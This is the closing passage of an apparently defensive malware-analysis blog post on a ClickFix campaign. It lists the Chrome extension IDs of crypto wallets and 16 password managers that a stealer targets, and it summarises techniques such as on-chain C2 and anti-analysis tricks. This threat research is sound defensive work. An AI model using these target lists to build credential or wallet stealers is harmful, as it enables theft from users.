76TON Walletnphplpgoakhhjchkkhmiggakijnkhfnd
77Auro Walletcnmamaachppnkjgnildpdmkaakejnhae
78Talisman Walletfijngjgcjhjmmpcmkeiomlglpeiijkld
79Metalet Walletlbjapbcmmceacocpimbpbidpgmlmoaao
80Coinbase Wallethnfanknocfeofbddgcijnmhnfnkdnaad
81Guarda Wallethpglfhgfnhbgpjdenjgmdgoeiappafln
82Virgo Walletibljocddagjghmlpgihahamcghfggcjc
83Soter Aleo Walletgkodhkbmiflnmkipcmlhhgadebbeijhh
84Fin Wallet For Seidbgnhckhnppddckangcjbkjnlddbjkna
85StarMask Walletmfhbebgoclkghebffdldpobeajmbecfk
86Byone Walletnlgbhdfgdhgbiamfdfmbikcdghidoadd
87Rabby Walletacmacodkjbdgmoleebolmdjonilkdbch
88Core Walletagoakfejjabomempkjlepdflaleeobhb
89Komodo Walletdgiehkgfknklegdhekgeabnhgfjhbajd
90SubWallet Polkadot Walletonhogfjeacnfoofkfgppdlbmlmnplgbn
91Twetch Walletjaooiolkmfcmloonphpiiogkfckgciom
92Venom Walletojggmchlghnjlapmfbnjholfjkiidbch
93FoxWalletpmmnimefaichbcnbndcfpaagbepnjaig
94ScaleWalletoiohdnannmknmdlddkdejbmplhbdcbee
95Station Walletaiifbnbfobpmeekipheeijimdpnlpgpp
96Compass Wallet for Seianokgmphncpekkhclmingpimjmcooifb
97Enkrypt Walletkkpllkodjeloidieedojogacfhpaihoh
98Alby Walletiokeahhehimjnekafflcihljlcjccdbe
99ONTO Walletifckdpamphokdglkkdomedpdegcjhjdp
100Glass walletloinekcabhlmhjjbocijdoimmejangoa
101Leap Walletfcfcfllfndlomdhbehjjcoimbgofdncg
102Klever Walletifclboecfhkjbpmhgehodcjpciihhmif
103Keplr Walletdmkamcknogkgcdfhhbddcghachkejeap
104Temple Walletookjlbkiijinhpmnjffcofjonbfbgaoc
105CoinWalletoafedfoadhdjjcipmcbecikgokpaphjk
106Biport Walletmapbhaebnddapnmifbbkgeedkeplgjmf
107Swash Walletcmndjbecilbocjfkibfbifhngkdmjgog
108SafePal Walletlgmpcpglpngdoalbgeoldeajfclnhafa
109UniSat Walletppbibelpcjmhbdihakflkdcoccbgbkpo
110Yoroiffnbelfdoeiohenkjibnmadjiehjhajb
111Slush Sui walletopcgpfmipidbgpenhmajoajpbobppdil
112Koala Walletlnnnmfcpbkafcpgdilckhmhbkkbpkmid
113Ramper Walletnbdhibgjnjpnkajaghbffjbkcgljfgdi
114Eternl Walletkmhcihpebfmpgmihbkipmjlmmioameka
115OsmWalletkmphdnilpmdejikjdnlbcnmnabepfgkh
116IOTA Walletiidjkmdceolghepehaaddojmnjnkkija
117Miden Walletablmompanofnodfdkgchkpmphailefpb
118Wallet Guardpdgbckgdncnhihllonhnjbdoighgpimk
119PWR Walletkennjipeijpeengjlogfdjkiiadhbmjl
120Yours Walletmlbnicldlpdimbjdcncnklfempedeipj
121MultiversX Walletdngmlblcodfobpdpecaadgfbcggfjfnm
122Parti Walletgjkdbeaiifkpoencioahhcilildpjhgh
123Fuelet Walletbifidjkcdpgfnlbcjpdkdcnbiooooblg
124OORT Walletcflgahhmjlmnjbikhakapcfkpbcmllam
125Ambire Web3 Walletehgjhhccekdedpbkifaojjaefeohnoea
126Meteor Walletpcndjhkinnkaohffealmlmhaepkpmgkb
127Kaia Walletjblndlipeogpafnldhgmapagcccfchpi
128Concordium Walletmnnkpffndmickbiakofclnpoiajlegmg
129Wigwam Web3 Walletlccbohhgfkdikahanoclbdmaolidjdfl
130Bybit Walletpdliaogehgdbhbnmkklieghmmjkpigpa
131Fearless Walletnhlnehondigmgckngjomcpcefcdplmgc
132HOT Walletmpeengabcnhhjjgleiodimegnkpcenbk
133TAP Walletblcaacmeglnfblclocdgaomhopnfobof
134TokenPocketmfgccjchihfkkindfppnaooecgfneiii
135Hana Walletjfdlamikmbghhapbgfoogdffldioobgl
136Leo Walletnebnhfamliijlghikdgcigoebonmoibm
137GU Walletnfinomegcaccbhchhgflladpfbajihdf
138Backpack Walletaflkmfhebedbjioipglgcbcmnbpgliof
139Mavryk Walletcgddkajmbckbjbnondgfcbcojjjdnmji
140Mango Walletjiiigigdinhhgjflhljdkcelcjfmplnd
141Fuel Walletdldjpboieedgcmpkchcjcbijingjcgok
142Exodus Web3 Walletaholpfdialjgjfhomihkjbmgjidlcdno
143xBull Walletomajpeaffjgmlpmhbfdjepdejoemifpe
144Puzzle Aleo Walletfdchdcpieegfofnofhgdombfckhbcokj
145Typhon Walletkfdniefadaanbjodldohaedphafoffoh
146Radix Wallet Connectorbfeplaecgkoeckiidkgkmlllfbaeplgm
147HashPass Walletflhpobcpjeilaheadnpdkkinakogbdhb
148Magic Eden Walletmkpegjkblkkefacfnmkajcjmabijhclg
149Zeal Walletheamnjbnflcikcggoiplibfommfbkjpj
150Jupiter Walletiledlaeogohbilgbfhmbgkgmpplbfboh
151XPLA Vault Walletocjobpilfplciaddcbafabcegbilnbnb
152Portal DEXieldiilncjhfkalnemgjbffmpomcaigi
153eckoWALLETbofddndhbegljegmpmnlbhcejofmjgbn
154VESPR Walletbedogdpgdnifilpgeianmmdabklhfkcn
155Lace Walletgafhhkghbfjjkeiendhlofajokpaflmk
156HaHa Walletandhndehpcjpmneneealacgnmealilal
157OneKey Walletjnmbobjmhlngoefaiojfljckilhhlhcj
158Noone Walletbgfhmafjampalkbjicjcjiikhlaggdnm
159Parallel walletjbkgjmpfammbgejcpedggoefddacbdia
160DPal Walletlmkncnlpeipongihbffpljgehamdebgi
161LuckyCoin Wallethfbglbedehonhmcljhlomlbjgmblieip
162Arcana Walletnieddmedbnibfkfokcionggafcmcgkpi
163Plug Walletcfbfdhimifdmdehjmkdobpcjfefblkjm
164Bitway Walletenbnpdbkfjdnhlepfeaaahegcggljhdh
165UMI Walleteinhphiffjfjogeofkpclobkcgennocm
166Volt Walletfiehfolhefpnoihmfggndpmibfgbpico
167Tomo Walletpfccjkejcgoppjnllalolplgogenfojk
168EternalWalletlbenhokjibnlmfdhbgeacnocgmjegfab
169Bittensor Walletbdgmdoedahdcjmpmifafdhnffjinddgc
170Alephium Walletgdokollfhmnbfckbobkdbakhilldkhcj
171Bitfinity Walletjnldfbidonfeldmalbflbmlebbipcnle
172Salmon Walletejbidfepgijlcgahbmbckmnaljagjoll
173Wizz Walletghlmndacnhlaekppcllcpcjjjomjkjpg
174DID Walletibjflpbmadchofnbpppegdbnifdgincp
175Speed Bitcoin Lightning Walletmiccfnlbijkmbckaagllchcfknjhgfnk
176FACT walletidpdilbfamoopcfofbipefhmmnflljfi
177Console Walletlpnfhpbpmlobjlgkdmnjieeihjmihhjd

#Appendix B — targeted password-manager extensions (16)

#Password managerChrome extension ID
1iCloud Passwordspejdijmoenmkgeppbflobdenhhabjlaj
2LastPass Password Managerhdokiejnpimakedhajhdlcegeplioahd
31Passwordaeblfdkhhhdcdjpifhhbdiojplfjncoa
4TweakPasskmbjcfefmceiibhnddbeenklcmpehmdd
5NordPasseiaeiblijfjekdanodkjadfinkhbfgcd
6Keeperbfogiafebfohielmmehodmfbbebbbpei
7Proton Passghmbeldphafepmbegfdlkpapadhbakde
8Bitwardennngceckbapebfimnlniiiahkandclblb
9Kee Passwordmmhlniccooihdimnnjhamobppdhaolme
10MultiPasswordcnlhokffphohmfcddnibpohmkdfafdli
11saaspass-dot-comnhhldecdfagpbfggphklkaeiocfnaafm
12Sticky Passwordbnfdmghkeppfadphbnkjcicejfepnbfe
13MasterPasswordhifbblnjfcimjnlhibannjoclibgedmd
14Enpass Password Managerkmcfomidfpdkfieipokbalgegidffkal
15Dashlane Password Managerfdjamakpfbbddfjaooikfcpapjohcfmg
16Authenticatorbhghoamapcdpbohphigoooaddinpkbai

#Conclusion

This campaign is a useful snapshot of where commodity malware is heading:

  1. A compromised storefront as the door. petshub[.]qa — a real, working pet-supplies shop — is the lure, not a purpose-built phish. ClickFix campaigns have learned that hijacking legitimate WooCommerce sites beats registering burner domains.
  2. C2 on-chain. The macOS chain resolves its command host through a Polygon contract, infrastructure that survives domain takedowns and blends into legitimate Web3 traffic.
  3. Product-grade stealers. A branded, versioned macOS stealer ("GETWELL") with a wallet replacer capability held in reserve, rented out through task-dispatching backdoors — and, on Windows, a commodity ACR Stealer build riding its own C2 network.
  4. Defense-in-depth against analysts, not just defenses. Self-hash checks that defang defanging, stack-keyed decryption, Heaven's Gate disassembler traps, and self-modifying code keyed to per-boot machine randomness.
  5. The human as the exploit. Every technical marvel above is unlocked by a victim pasting one line into a terminal.

The appropriate response is layered: user education for the paste, EDR heuristics for the chain (TCC resets, APC injection, HWBP tampering, LaunchAgent creation), and network IOCs — the txid POST body, the Polygon contract, the ACR Stealer C2 domains, the exfil endpoints — for the hunt.


Disclaimer: this analysis was performed for defensive research purposes. No payload was executed at any point; live samples were downloaded straight to disk, and the final Windows implant was extracted entirely inside an instruction emulator. All indicators are published so that defenders can detect this campaign; the decoded artifacts must not be run on any system.

Found it useful? Share it
← Back to all posts